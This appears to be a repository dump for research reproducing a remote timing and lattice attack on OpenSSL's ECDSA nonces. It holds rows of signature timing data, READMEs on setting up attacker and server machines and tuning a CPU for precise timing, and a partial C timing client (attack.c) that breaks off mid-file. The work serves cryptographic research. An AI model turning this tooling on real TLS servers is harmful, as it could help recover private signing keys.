1980448390397921111258129189680083645969273091589 154 | 25057902692638600094545296140441512552522604763 3178588293697973133993231773490671236961450252922 2671281934499207819980305204534864959516719514156 2274268415989652632639906970097572249676173696238 155 | 28392297903098294078035096693844552003784457813 11524982941800166232345079417093538512757542284673 2087912218013553896974889822893204884811450441952 3009233317258690993945242280751767291461468210346 156 | 43330927102123982063950520474076464855148940056 2881306020646103244837261374212023389996071800527 216433468180294537181664348213566081052033846481 2344795556861719071218317700544075686838618495110 157 | 32931754517283506244831499543154922135052541903 2654061619306392211957675984555407350976223691730 5025737582174983393173229444248990728421183962811 5454324890322254527729397120095931499477342086976 158 | 32483333135716813998357046094716635282701943407 9000736108010704884546360146534235997818638107230 1673758402424062331391724995582018560819758881341 607584197669439006787397671793480348374855861936 159 | 34898473119972069997151756749721977797116277154 7082847553141956799562010579293631322008781098081 3277064830155250724005795109828986368499688023776 623426705162841162127244633299566957231869775687 160 | 24605230047833580599374712338007129481937618005 1367841833250521935042329562555312557538406752681 2591305694999457653472724661495937533230408063308 713435530387074348611596204040843606673436850431 161 | 40335747784063195919063913569041223026956320532 6557683056168550767540073521567039123793069583441 146353452844689769291473764557037167246472032811 4752769919120599130213129859831579667500789309637 162 | 28495711602425949098723651989910465266357771080 2843564878217911939368551346146388463129896632294 2014636313167991733805552378331465726262542823570 723164591151226735288009670393184413040910827693 163 | 39583884563529433635792032218099295134564061196 384289921385757152475804949870421444160670508970 1231271383798687476372959900973380127798136842635 3172537727745437609251811848791153310100299823811 164 | 31735436485044007150162716323564287807533185677 6060331853366571647308625928429534689938461549622 2225762185075785546169826200752061342785494649413 670703993003406842050893339899353228547355636445 165 | 27893861174292913402148455928236416419146815436 5660328590162355846210969664250277939415608125957 309417578257873709775717874105742494561522452039 1911380456592165946227060106442283836803216544207 166 | 41507315067584419938913701164209609788347046505 5086059839262279294946951587500611275572580386556 1197717501899380543596332950202090434776560979022 3160885659767412103879810265384843293484934120262 167 | 32470574590528251994887188486789097084351600795 3945042525630145847716897853168897955293704412649 581278082964649255218093995392485437215302394604 3039755299033316284190039343022896787766688440217 168 | 40698978968493703623773993999428343497419630590 3056103990856672023589379430809923800537761394672 1619769240774432535048213015879153093213073532124 858680889838887787579797321784129301333318287976 169 | 30384250216949219587243917372286314675027509520 5554098563217130054501936649360895218134683359281 5161201554234106824998592899651815133428610951029 5124446465780369205596242496926839804367728487884 170 | 33150866520873859371907361711783689802036947898 1856895368575514908030341857090631772452927293538 4652378485110090731358097464858793178356190990133 83283290394101097706121911840735158513147935718 171 | 43850254418609465071184379218970326065811597521 10363253210000186321683722767163725718861887610297 4427506897501777443997423493162367052213015521881 3928815264027196567897782584793941024679382417520 172 | 40510764257481852168124634028263717765994149957 4580117335263014216885617000356761382206885235242 1031265583179792622491022585415017873127865254248 5556345571093603695551848311630056254231612951908 173 | 42796897555701362913966622344289903056454144610 1220511130724566122767113369159645238965096573873 5338603703304087528573438552933301125437559104423 2745838674870142323674907299920251339189751799891 174 | 36646439354520965585023886336104038259666201438 8141904395848222095661367054735998678318957615817 5756952062648569603965161507886693363948920524976 3884430030502166460518274338911832608021841957633 175 | 39666728477256846050423122736506610842040160996 3615689667007338756573617866467548704909489340964 5435832535101230077531366675641290437171305313683 2199921228790330518017447861094788183700251267892 176 | 30914358389723416050600729935778017605728690637 5709019981088993804618546568646172102866439274555 4029345773157648902565941587391476563663057467380 1778383199919006329063947807921462752410991417457 177 | 42678718352046909040443406698394374386947934500 9485803990020976346257340493566761342763417309034 241539248934411390206794668413133339585649374123 3243343251474689450979348104919262001505905233174 178 | 33950972114772829573679383373395509406542029168 9142712134005661874207005727419312879184742168947 990212477930888351183509698875598716151618977018 4850296307705612994626754426317646414348078567430 179 | 25873536173073576730042318243129657486748616486 6025730163867870970866196095524774484927062007787 3180205269053270717796213193300815561685470104528 3152110144864516514165563925184734898326261100231 180 | 23140063258484283705869204916627849282252348692 1726483144051223814653493617922778693279208052951 4539609801163187887347038652800680028704903065249 230174674850070972121268527728294376577545674811 181 | 37716891630358846282384210878713635712558496903 8262904077920337121501727204796656017974874176184 2792809945832015779331005468026454794361042800311 2802576726049955913948621299125280071623645668895 182 | 27350691579289984926439973013774633711826986226 2982332556563499925649231821376499858286492903326 1933916034840273127147296320630478386356609269186 3644782352604708545079380762832643872929763477478 183 | 28046587719276740005380717936732371391483078851 11669204468442333160580731979564764886179981199686 5708089301290509092480389160747852819711017158250 2588955056670151497882653024623112819363437224570 184 | 37971539443486001417837663049868743793322084561 1201040835602132402238925093590981179803786027288 3072334978887845950626579887305762284568661934978 5368433985144360897269712687923861474859700269172 185 | 36668414457096204190921683334128949714767575455 11040792213340581413707560126033855795506160978067 3112212692193420073347106373161208424894729086676 5244279821678157042090530587453991967198831806668 186 | 24471765187292093394049909755581092022714604919 630806789233673890949042596430537711498705946911 4855800984679239085409099242992601911973986402441 2740219618649665778364919413073583603231104960377 187 | 43880490054352322816088819095432835010359418211 27462015832097870183257023672953362767400239790 2558011188748545389149791540723314748554674260992 688610614319893213445078327924404951237862329001 188 | 29784979101510679859878212928884625488157710284 8201608553395799013741780040988734192814102595289 2459121458574172166053925961752331804793478930716 3336469767492459618282400449646646704716915754713 189 | 28756040362093634531615938610109262007300127538 8320077441212388498852351398963673733453150361939 23293643450404709901796560553740893831010510370 4997686137105200176882511816252823791835119821625 190 | 31197890836200703585862141288263346342819922232 7168496633727322280886515915531203989274445094114 2841916646005235010814642348318483834921878432499 229731557094744106851366341467672282702448243526 191 | 27013421896467601672244345523167035987908316984 5061729989520042196547119039034086501400344775586 4415285561100507647737512839461247404387455108836 1454998255709148267862685703023832432437348061529 192 | 34577126445222667333972597485984370281632921896 976149176325866303154048300505565143481625113245 2699219990545451832882188759395307701118563139379 3986164151885582917082759718491127070012970380078 193 | 41949365861671763820618326318326020791766291903 552100724539693223571556575841201753605008334070 1633467005615074273358859497808523719040408652729 1432242208181864793916572508443480093159388813320 194 | 31199968412734596498049230505343880307004863879 4515395557313931028444562869278468131366408900728 2201984124520777179919428685134442451918666433939 5439789129257673652676487751502560942478034289467 195 | 43731698869495080955728483930243789889346731609 7566714513669288396481065660161957657059731069121 3466078248299853940193170436800847815651496581569 3099449637742757763897771779819370514845260670243 196 | 33181009487366881250886521136752906962309651000 2464107149978559526588108228235745223803197579390 2140281197064144379907152459929630890327825055112 2646125756755974416834047820064284130465232342212 197 | 23789731508295107476218861993053282586784733023 7380417224078731172300685391850971012423109624217 1505371885333641177135891063700168037786152405595 1089756718941210613681308598376414937794739336206 198 | 44000921913816372769507814100801807927706733470 11663667035983016995263897063816006109249746638278 297754335691077042886367633687006805336098314792 3943316765348974618512359740244805404846301393447 199 | 23021222770571621016700104206353535332425236935 2005993423756019160359205329806386196257647056746 804666270209541669533792363096516552144707573612 1650954560925406860016366230084557251579157476528 200 | 37693550444101520515624593218726495537821884736 2596232146350930300514508852342126327300835073294 4516921765774990131323059407282410847310268244954 3513745465091427719441179552987257847319650837323 201 | 32822436211517548830358541286349669958667024470 4838839625898064182372553999964352991539621580644 1926808344612205794778541489540305765931982985310 4319320260848237579637196840428166030808896153455 202 | 24297944202676079266416604093262273900561178882 7250558265042663059571828264345900608386664910773 5603002258627833845317229914964656386156375737037 5181882476942979963100931844172173970571156028713 203 | 34579636697566190859272170380024976111978401915 10655996630259061751779400873379110518085902176236 1531278032690161790855543147543226025822594590626 3345934398790266821086728632203737231659501983277 204 | 42600476090326403351031368484028867230610210456 188862688804246488864277087570183570478058764276 1013716148335418900365510589953123124932364626001 2625586228931405151379467304478307227904942634457 205 | 28142031751262552707813264822532618033086945529 6092171231028438094762281065022426007053544208935 4657605500264041372883809751725474327230463786342 2414951004601903616704254367907354860807854252198 206 | 41808276141069591902511708186965917884147083234 3037110468197402529908358666358360987711825201011 5545723286071115793852098803469042509806150329253 194712412194779191856958263847233048008405784582 207 | 39531619083054058737871536571890325671367856479 7390955660239735133300774296172077596200907254902 4755478374639115552546005278639995529042647706979 4343242853251981383365053895067762234357059117688 208 | 28304337588339672313118279739545978316111321320 10357670358067570193971487426687668168736062563884 2965490952364811587286929015660781911296019780769 4402388169081069280642100116208385662640248475473 209 | 38335057460807536826794380562617150021993416742 145365640659258610776342991891825959885577151661 3503603754940231572339401177002432849562270534828 381742507401436454396401435044668219854513223507 210 | 32085151427677131251406344764314773472367577508 9123329041153575744065200510847962255439899156750 4384282907599615439068370313107175179187626134 3592441386475325231801572902156371035014141562282 211 | 38941394565121420416498304075854395079630439359 5452162022749830232314221821615398816549304716910 132052037246845598174790866979735449818086611466 621849462872725662371241033328901270722548604200 212 | 36349560827182937139997910616313155428773716275 11411537666376176379433821339854261465517840972007 2280657661163709472953466249127082661645673806355 4700440800765088481464487039713149971395447139927 213 | 44687758832165182373969959299489384949469988673 9381072273985925441348645416396716185813962328230 2159010772065521675881877867860555613205863358350 3963022690548565634891104347518413455636289459108 214 | 37781920547051369380566313701522886729449491297 1250963201945841519254267097530678584039084680378 2784338360339729043761587101811264577089322975020 3088348273032789682734783710872729977750658543126 215 | 40562163255489721426393827123496102272870685846 2554197754418146131685485131284587798546946044664 2872864632012028929576726698339792821411362166042 3387953189885443324160342096722012935878762798371 216 | 29359016419734946781721368231565126700159757312 571210089262063839487730669317021677497357483220 5127834043263518468280231166638487038425121258204 1959924343789379553855122571905096929160470126814 217 | 29669970181301267648573464778413161624717822175 3751176004876311989213001763535435061262457941811 3523824778930264051417813131491134416546438528520 3598771361491831395694052559322524653122602928422 218 | 43266240670431200061457223598652194528107174760 4982087809492080467831442419099186314282722894532 4992235144650857259595648942011797200604986734018 2075803460654493931354546596750181351402781164446 219 | 38953080207317859701690009185222014710334748969 8092220577648009767473031952407506604690921306467 694352163036885924210117216590308518718245603399 3546019645192820526357286089465151125959440203132 220 | 41631066021868861897323160900990753813919551678 7115205455327886273596383485538525460456624833856 1546696073210768920451151866548836657528755642263 3645474827090027745023340259092803253980764015617 221 | 28961470557952212091869326945667824254593354139 5043467113430322329513161660829069751836428482616 5646713718123356883687245348174729218754616054637 4418713753962870627208032515430151771956443120522 222 | 33879853091574286620837797985379131771534662694 3265448881435658269973492624385513829658358739950 3548263727547718171892568718141948963948719433567 2717343912278503284844561515628569409335177964598 223 | 23415764331702616632763982882618327220611471213 2105213392337454440599380973822916731820843699591 4485706908734161525281734937013493657947792405120 156783857297603320020980897607148294819882769228 224 | 35464044190742015762903018738568279230833263673 585737687245191088820590120066678469752340637804 4405571098473795594171079825528114971918273490352 3293406999066152643783978633350909439004344717955 225 | 43498179377399138152009855976311888852108461662 9276611311760283748520919438004588680868688464231 2452153864658925581880263870922814937757664804673 4824432559718297074966977953727173876619815847847 226 | 36388362249476153856051640933560132351349099029 3633859403789963362178324291280829128456822771032 3806963716090660857956066856284561911292242223832 1599327940807697925504114764807691718941513259002 227 | 28650215264501658970439582187536362142904344167 2280150553733973186254174999087509970609937571568 5578018078058908350429087020862848438913083149324 1330654488671122061870572626995660598657588008660 228 | 39726693503431104017282350688201238650739723969 3951183600615946071033776627500562122717389700277 4249646292648545720765503065141846414751842892365 3121899337256851412600849828702381711811475121783 229 | 39914152283185220876915172365875948185441827704 6533286767739305968626092894685533861649380200603 3962265956766943496062410555540686766597859332650 1643935699255421136578798605420937193752178903105 230 | 44547021399781219520202841096034378023468661526 582777179900522967713445736598213905828984643675 5264087908691634154357288063842166203795905882006 3046377984096103605685173174595999069514608904369 231 | 31631182654456783972610144815568643812155507258 10680879039154446853518523258590872997713694318196 4554836225344556567476548282951979707524606949199 993725301847979757488110444975769372259126057450 232 | 30643021443776344332727151627334755579449206961 11316238269701079461759890873795544476347604777342 2721140262240353721163155510276977056257910701130 5480373119232345894585309123421866376766030035519 233 | 41462915762373668590232793050132295537057824962 4749142569298845148622254564627920568098634348289 2366811721500095416696455721571677720269702522280 5128569370579742660492763598613546818778119785667 234 | 26218467276836206230231425689471438906501045847 9740065066684598014897586956755212669569544698714 3567409713043511816232113242954446081127008521074 3839321338022538030626426205701873911998922193448 235 | 32737543668529339665770551517595718398416179234 8494872864904665618418199271288866997853805576840 672020301083788874956651588351801309282265202913 4088778338025673177422981414133236503504273365471 236 | 28683803432536300613545279304054095808672755667 306919100921195592593142984798498862185799853193 4071226603363338731831753687407044930783570301765 3384215959915693354829473661742378032660041445451 237 | 27577274248204885788948283762657612003722373988 6775183415515752699755251045057810170136150256979 137685843477330348562213081430517924587546303541 1499684231578757291669562488234196590249236455882 238 | 23732375458889988724245326518805566076829435910 3655754353538465268698152501357848638921151700251 5103009226412785427273959277746174386141199511424 1320223176192918864649896869832566409550842923715 239 | 27919369551071649941619265598177495792266629074 2307912056287208192898131684077260680390341432198 1983800160442368859445335090824233852318036588202 1028406777596679974806725963502083995359425880430 240 | 40852846956428919099814966361054938684178782146 4471950959498051509261909253259544879077012501520 5630457071140250303193706778636325121811330839089 1348776453011038213667631522926619293569210781617 241 | 23947243338253077098077234053841791882660002957 2548296149164858169258694965392294449053513717876 2084127259413772371564827966752378223353108644688 4775174641271012592942892940847963738972091881874 242 | 29285454184390781925092373680671008862661653666 1670220350575709136597075493728188209693348373848 5340168753165924290038759598514179539039669320492 167744810551491429094752051992488493124652030723 243 | 30784400772253631939129240550928176176404616333 7320848291643176778653837168934440555381479662245 1293714317532839165601440467561116780711813968488 168919666019257915661595997587099080005155991004 244 | 24099472288191001914254876887498322319324769852 7357509845129117586429858165261091802655088617382 1044816584938863682516299843962825699593436991547 5533196046317351493531506637463534442407981751865 245 | 33065175769425505274896380539990485710799457841 9441052508558540049600182537160629505341528198101 1298380601209508066520441676649963475979085667284 1109506525110366382523343221574908787384372563904 246 | 30137135897572965483878796720860903029464632974 4597830753047070361800889932156136185609174540723 2523909305160841310753874266221891588778684964382 826494963609020810652075980273790492816650653075 247 | 24936122496011178797852878482123258219724925420 9592520105354326457754817065385532666045628026453 5672817947420818276999337960048019037571204279190 3952096783999093128408617430452818220064590008186 248 | 30142831128763453686911930957453017213756444564 2442931533190941716697533544086042183167687853417 2151803828182041529900136487731519303111601464541 5261588590360858326007163196000358938663622209662 249 | 32491712188080948155712103830887839766116790240 2752860575553268895717663740064579376292851486890 5192570453710785543261971539188799767060864283409 3777539983009637934260540737738840954799231922811 250 | 26167054189496596996628249792442563492322401658 2240056801840142680511019922798362232325577194821 3281993178363183199579777358944649136205413277927 657809628854440025158878926811529745457178009504 251 | 39744345804313710809708542943130445479573037355 5713589801826144576976106140082560912645267998299 4246542998952942248312275928111159334125160008863 938613073525621905749540965034859261385300023061 252 | 23641281532091112532431689615271862849403924415 9655484081208795146578175985957553149368397456008 308423359824534377739954955329121057564135023708 2441085871984777311619837022837818631989379666743 253 | 41271733620429357649644318199678128344454765528 9489345953660337577340010629447007319230512527861 759727030928515515422835171827721819017475292839 4886479254687502606633398356590839127912833159980 254 | 40150881432097694617319416568869005666241233902 6089851760298573635878426850742613363676538434076 2294868163821891940078819024076472838304549480671 1238584861676281530086145292813404641079902366125 255 | 33470869937276328559264623408692405725857303200 5165628500158470027227554908047189193117614721952 4582633674723527616175365797414085783454574273821 3435620983794960564743679386475339522886165107436 256 | 29405098392824031626012019287774902975034813174 1319210292008515549729173290567995722308079989663 2911952425445330268120259024881860683625125918548 2040311270748322585631103412652628052686341457101 257 | 39908994403995772294408154367058698127118893360 11014030515204200087132618840412776745126712435794 2834903503023722031312587434316241655239813022019 1809087988331531411246616029040665489001868349799 258 | 24843373054897578624531725990620296803219402798 3636334167049960288286154789280867207230111687334 5557627741863696422320171108821158432996153562095 152391340750583700995178322953058668336646619184 259 | 37631620833834310565016736367781933711361156084 4849065527016381971098234040572584005492195238043 2332847050878262421635621261717024707614695748657 14975374643497570547268398586401167987813060116 260 | 29416418357543778824399103974440357338039903573 1520042693073862226154713879825425979006766121385 4739447911553096987810228714856724607913164570537 1793354282491028754183946749297709882285448624389 261 | 42526188102593861297562642234022784228995635402 11313853958139176109039186499675034635057804340268 5251448642497325357856233965237294754143632213439 4165408672017145134409683398977974361190307501081 262 | 40122547677999285733113660931815955844086474778 3059829307056394701779509771744318173577629416218 2856658417417290631518974053235738283469840304108 5404291835243664515680048463297855046763110633302 263 | 26135588298340643058521243567238315588099965078 7023695002205755606256484397599254186181928005341 770445694739084563734020365953501509436669870156 2410602797292889890439783780986854502807769044681 264 | 33881992396025458221756806634334934178236964686 7428611007128097317005731321169643208289759058708 3672742304398749206591464481724645731269561540472 3409262951435561558128730609936130374830966195844 265 | 43593829485855899953668813173381759779932583330 8819461804841360176028984609071816819678059372567 5621962206030987110701123690943950602377621056331 1388404117571708405157200354026870105776711574616 266 | 27943404509641668623399016086123268862685478043 999146826777780255180143304021484033345877131022 2137772028165077242272206290100635111960379824623 1964586476863508430697839543316464816648706705841 267 | 32365542994257133848843958638911557559205799916 4271674168645480279949457330486186984995311317536 2990757419397187663505551856187296628407117593728 188759093223145750186704720381282407122710516300 268 | 44241692877958945276348537598729408129079161903 5605422276479308037669264539478711693883117291248 4976934827447025560158419626444288527786049576029 513628387129290711566684711212347891111644025267 269 | 25350232158843404909575331461660527656339642588 8089622766314944517639901133856495374113286102509 2506799257456754392148672702383790630702789478296 5145130110501024432617009654447018435719278944300 270 | 34856526967365113164628141180087497067447387738 4637029227461280450710474215255123855310257487719 1339637732547308650584569939169792975366456219278 4453523244076186269852670312014732404761138956002 271 | 37105843080800803112449052393959726010568420166 1658238437123712685770583332331551592190002881706 1616475769717500599539542781726164124300751871529 2431170794650208150018487402320501085042966055151 272 | 29943349105685138231843875113159771016837337654 3567544401457545493039367991431244071181072816595 5768212396200765312607392900619371779191437117518 2458512726608771938218187202310105615711570963040 273 | 25141441000739403140331229501312863871438067146 681817010569480297247751153932343670064815819899 3546091846923263755194402259193532296512856407226 2929729556017367952669915173761572316434649547720 274 | 39124461088105219163204497990336701261169379971 4076803366268635091574916790585200792683576606142 66241316347992252023540865122086526139316872228 2100835711876397583178299931782127052983213934459 275 | 35301324141715275429838839418556813923841141814 11113201641757199442774917419774018305915697758961 3487611172390676903365604123934991885498638593473 3470686570767075219046934195523768277369556018502 276 | 38928422141423321410066847522865786749382553675 7603515971086859062203403391167364592271600100306 4382900291116416082508272564054426431915829805494 2349841674318686393022419577132065860978895944641 277 | 32208202781128928171366942573163556088395912244 5544441992047732808585619367085098114784508709814 995325717805424520615803592630381515101075460771 3384187276192702995614582241800570708119999374959 278 | 40410962877653985059119958656706820498101479406 9412282510267586808008632075991925353816277344308 583834971499088301533840890113145200588447199466 426452914883655511543234606362071318794507006956 279 | 38422811038431473117286474946132921998680521749 6568010433965123959477489583789676281924608702817 3993586914334053446658604848056281418215483064040 4023237153492877243269630403771791177853375708641 280 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Timing/Lattice Attack on the ECDSA (binary curves) nonces of OpenSSL 2 | 3 | This is a work trying to reproduce and improve on *Billy Bob Brumley* and *Nicola Tuveri* - [Remote Timing Attacks are Still Practical](https://eprint.iacr.org/2011/232.pdf). 4 | 5 | You can reproduce my setup with what you find here. The lattice attack works. The remote timing is not precise enough to make the attack work (we need a huge amount of samples to make the attack work). If you can get the same setup and better timing that what I get below then you should contact me :) 6 | 7 | It works on an unpatched version of OpenSSL, but theorically it should work on any TLS framework that has such a timing attack (and not only on binary curves). 8 | 9 | But first, if you want to know more about this research [check the latest draft of the whitepaper](whitepaper.pdf), and here are also direct links to the [Timing Attack](setup/client/attack.c) and the [Lattice Attack](setup/client/offline/lattice.sage). And also a [demo](https://www.youtube.com/watch?v=P2NbKHn7RkI&feature=youtu.be) of the attack. 10 | 11 | If you know more about how to collect extremely accurate timing samples on a remote target I might need you. From a small sample of signatures I get mediocre results, the more signatures I get, the better results I get: 12 | 13 | these are the results I get from a million signatures: 14 | 15 | ![stats](http://i.imgur.com/Lt2Z5gD.png) 16 | 17 | And from 10 million signatures I get better results. But this takes ~19 hours and still has too many false positives. 18 | 19 | ![stats2](http://i.imgur.com/zhqgPGM.png) 20 | 21 | ## Structure 22 | 23 | * in `setup/` you can find how to setup the server and the client to reproduce the attack (and how to modify the server's openSSL to remove the fix) 24 | 25 | * in `datasets/` you have data I got from my own experiments. You can play with that if you don't want to setup a client/server. Note that my measurements from the client sucks 26 | 27 | * in `tools/` you have tools to play with the data in `datasets/`. Read the README there for more info. 28 | 29 | * `PoC/` is an old proof of concept, it can run and find a key. It's not very pretty though 30 | 31 | 32 | ## To Do/Try 33 | 34 | * Time with `SO_TIMESTAMPING` on raw sockets. Use a NIC that allows for hardware TCP timestamping. Also try to get nanoseconds results. See [timestamping.c](https://www.kernel.org/doc/Documentation/networking/timestamping/timestamping.c) 35 | * Look at [what Paul McMillan does](https://github.com/PaulMcMillan/2014_ekoparty), basically the same thing but he uses tcpdump and parses the pcap instead. I think it's less clean. 36 | * Find other ways to optimize the network card ([Tuning 10Gb network cards on Linux by Breno Henrique Leitao, IBM](https://wiki.chipp.ch/twiki/pub/CmsTier3/NodeTypeFileServerHPDL380G7/ols2009-pages-169-1842.pdf)). 37 | * Time UDP packet instead (and target DTLS). This would allow to play with raw sockets (ip packets) directly. Is this a good idea though? 38 | * Look at Nguyen way's of attacking ECDSA, he seems to build his lattice differently. Maybe we can get better results on the lattice attack 39 | * Modify the ClientHello from the timing attack to only accept ECDHE-ECDSA... (so that we can test it against different frameworks). Do a `openssl s_client -connect website:443 -cipher 'ECDHE-ECDSA'` with `-msg`, `-debug` or tcpdump the traffic to get the packet. 40 | * Truncate the hash correctly in the timing attack. I still get the hashes directly from the server because I'm lazy to understand [how OpenSSL truncate hashes](https://github.com/openssl/openssl/blob/master/crypto/ecdsa/ecs_ossl.c#L286) 41 | -------------------------------------------------------------------------------- /datasets/README.md: -------------------------------------------------------------------------------- 1 | # Datasets 2 | 3 | These are my timing, the server and the client are on the same network. 4 | 5 | Check the time of the last modification, I will update them as I make improvement in the timing accuracy 6 | -------------------------------------------------------------------------------- /setup/client/README.md: -------------------------------------------------------------------------------- 1 | # How to setup the client (the attacker) 2 | 3 | ## The attack 4 | 5 | * first compile the timer/packet sender `gcc attack.c -o attack` 6 | 7 | * configure your machine (see configuring your machine bellow) 8 | 9 | * run the attack through `./run_client.sh 1000` to get 1000 signatures 10 | 11 | * if you are running the server as well check the `/setup/server/` directory and follow instructions there 12 | 13 | * check the results in `responses.log` (will get erased before every `run_client.sh` run) 14 | 15 | * use tools in `/tools/` or `/setup/client/offline/` to analyze data and/or mount the attack 16 | 17 | ## Configuring your machine 18 | 19 | ### Frequency Scaling 20 | 21 | I disable the frequency scaling so as to get good results counting the CPU cycles. 22 | 23 | ``` 24 | sudo apt-get install cpufrequtils 25 | 26 | sudo cpufreq-set -c 1 -g performance 27 | sudo /etc/init.d/cpufrequtils restart 28 | cpufreq-info 29 | ``` 30 | 31 | or add `GOVERNOR="performance"` to `/etc/default/cpufrequtils` 32 | 33 | this also works: `sudo cpupower -c 1 frequency-info` 34 | `sudo cpupower -c 1 frequency-set` 35 | You can also disable ondemand daemon so that it doesn't cancel this after reboot: (although that might not be what you want to do) 36 | 37 | ``` 38 | sudo update-rc.d ondemand disable 39 | ``` 40 | 41 | Don't forget to disable this after your attack :o) 42 | 43 | Note: if you have the `intel_pstate` driver you need to disable it and use another driver (`acpi-cpufreq` for ex): 44 | > You can check your settings with `cpufreq-info`. It will show a block of information for every core your processor has. Just check if all of then are in perfomance mode, and at the maximum speed of your processor. 45 | 46 | https://wiki.archlinux.org/index.php/CPU_frequency_scaling 47 | https://wiki.archlinux.org/index.php/Kernel_modules 48 | 49 | `sudo cpufreq-set -c 1 -d 2600000` 50 | 51 | > The idea that frequency can be set to a single frequency is fiction for Intel Core processors. Even if the scaling driver selects a single P state the actual frequency the processor will run at is selected by the processor itself. 52 | 53 | > intel_pstate can be disabled at boot-time with kernel arg intel_pstate=disable 54 | 55 | `GRUB_CMDLINE_LINUX_DEFAULT="isolcpus=1 intel_pstate=disable"` 56 | 57 | ### Dedicate one whole core to your attack only 58 | 59 | http://stackoverflow.com/questions/13583146/whole-one-core-dedicated-to-single-process 60 | 61 | * Add the parameter `isolcpus=1` to linux boot arguments. [How to do this](http://askubuntu.com/questions/19486/how-do-i-add-a-kernel-boot-parameter) 62 | 63 | * Use IRQ affinity to stop interrupting on that CPU. [See redhat](https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/Performance_Tuning_Guide/s-cpu-irq.html) 64 | 65 | * Use CPU affinity to use only the cpu 1 for your attack, this is already done (see *optimizations already made*) 66 | 2nd answer 67 | 68 | ### Power Management 69 | 70 | > Modern processors power management features can cause unwanted delays in time-sensitive application processing by transitioning your processors into power-saving C-states. 71 | To see if your application is being affected by power management transitions, boot your kernel with the command line options: 72 | processor.max_cstate=1 idle=poll 73 | This will disable power management in the system (but will also consume more power). 74 | For more fine-grained controlof when power-management is turned off, use the PM QOS interface in your application to tell the kernel when to disable power saving state transitions. 75 | 76 | from https://access.redhat.com/articles/65410 77 | 78 | ## Optimizations already made 79 | 80 | ### CPU priority 81 | 82 | Use `nice` to set the CPU priority to `20`. 83 | 84 | ### CPU affinity 85 | 86 | Only use one CPU for your app. If you are using the `run_client.sh` utility this is already done for you. But you can modify it to use another CPU (0 by default) 87 | 88 | ``` 89 | taskset -c 0 my_program 90 | ``` 91 | 92 | ### All but one byte 93 | 94 | Send everything but one byte, then send one byte and start the counter, this will not work if Nagel's algorithm has not been disabled first. 95 | 96 | ### Stop the counter as soon as you receive a response 97 | 98 | Modifying OpenSSL to stop after signing something with ECDSA, we can check that the client doesn't receive anything. This proves that OpenSSL sends all the TLS record messages at once after finishing signing with ECDSA. 99 | 100 | ### Disable Nagle's algorithm in Linux 101 | 102 | From [wikipedia](https://en.wikipedia.org/wiki/Nagle's_algorithm): 103 | 104 | > Nagle's algorithm, named after John Nagle, is a means of improving the efficiency of TCP/IP networks by reducing the number of packets that need to be sent over the network. 105 | 106 | Disabling it allows us to send what we want to send as fast as possible. 107 | 108 | ## Open Questions for better results 109 | 110 | ### UDP? 111 | 112 | Since there are less rules on UDP packets, we could use that to attack ECDSA on a DTLS server, which should share the same ECDSA implementation as the TLS code. 113 | 114 | 115 | -------------------------------------------------------------------------------- /setup/client/attack.c: -------------------------------------------------------------------------------- 1 | #ifdef __i386__ 2 | # define RDTSC_DIRTY "%eax", "%ebx", "%ecx", "%edx" 3 | #elif __x86_64__ 4 | # define RDTSC_DIRTY "%rax", "%rbx", "%rcx", "%rdx" 5 | #else 6 | # error unknown platform 7 | #endif 8 | 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | #define BUFSIZE 1024*1024*10 23 | 24 | typedef unsigned long long ticks; 25 | 26 | unsigned char *receive_buffer; // buffer to save the response 27 | 28 | void error(char *msg) 29 | { 30 | perror(msg); 31 | } 32 | 33 | void init(){ 34 | if(receive_buffer != NULL){ 35 | bzero(receive_buffer, BUFSIZE); 36 | } 37 | else{ 38 | receive_buffer = malloc(BUFSIZE); 39 | } 40 | } 41 | 42 | uint64_t send_request(unsigned int index, char* ip, int port_no, char* request, int len){ 43 | 44 | int sockfd, n, ii; 45 | struct hostent *server; 46 | struct sockaddr_in serv_addr; 47 | uint64_t start_ticks, end_ticks; 48 | 49 | if(port_no <= 0){ 50 | error("ERROR wrong port number"); 51 | } 52 | 53 | // open socket 54 | sockfd = socket(AF_INET, SOCK_STREAM, 0); 55 | 56 | // disable Nagel's algorith on the socket 57 | char* flag; 58 | int result = setsockopt(sockfd, /* socket affected */ 59 | IPPROTO_TCP, /* set option at TCP level */ 60 | TCP_NODELAY, /* name of option */ 61 | (char *) &flag, /* the cast is historical cruft */ 62 | sizeof(int)); /* length of option value */ 63 | 64 | 65 | 66 | 67 | if (sockfd < 0){ 68 | error("ERROR opening socket"); 69 | } 70 | server = gethostbyname(ip); 71 | if (server == NULL){ 72 | fprintf(stderr, "ERROR, no such host\n"); 73 | exit(0); 74 | } 75 | bzero((char *) &serv_addr, sizeof(serv_addr)); 76 | serv_addr.sin_family = AF_INET; 77 | bcopy((char *) server->h_addr, 78 | (char *) &serv_addr.sin_addr.s_addr, 79 | server->h_length); 80 | serv_addr.sin_port = htons(port_no); 81 | if (connect(sockfd, (struct sockaddr *) & serv_addr, sizeof(serv_addr)) < 0){ 82 | error("ERROR connecting"); 83 | } 84 | bzero(receive_buffer, BUFSIZE); 85 | 86 | // Write all but the very last byte 87 | n = write(sockfd, request, len - 1); 88 | 89 | // Now send the last byte, which also starts processing at server side. 90 | n = write(sockfd, request + len - 1, 1); 91 | 92 | // Start the timer... 93 | register unsigned cyc_high, cyc_low; 94 | asm volatile("RDTSCP\n\t" 95 | "mov %%edx, %0\n\t" 96 | "mov %%eax, %1\n\t" 97 | : "=r" (cyc_high), "=r" (cyc_low) 98 | :: RDTSC_DIRTY); 99 | start_ticks = ((uint64_t)cyc_high << 32) | cyc_low; 100 | 101 | /* We get rid of the error so we can process faster */ 102 | /* if (n < 0){ 103 | error("ERROR writing to socket"); 104 | } */ 105 | 106 | // Read the first byte 107 | read(sockfd, receive_buffer, 1); 108 | 109 | // Stop the timer 110 | asm volatile("RDTSCP\n\t" 111 | "mov %%edx, %0\n\t" 112 | "mov %%eax, %1\n\t" 113 | : "=r" (cyc_high), "=r" (cyc_low) 114 | :: RDTSC_DIRTY); 115 | end_ticks = ((uint64_t)cyc_high << 32) | cyc_low; 116 | 117 | // read the rest of the message 118 | n = read(sockfd, &receive_buffer[1], BUFSIZE) + 1; 119 | 120 | // save the answer 121 | FILE* response_file = fopen("responses.log", "a"); 122 | fprintf(response_file, "{ "); 123 | 124 | // analyze the packet and re-read if n is too small compared to the length 125 | int length; 126 | int node = 1; 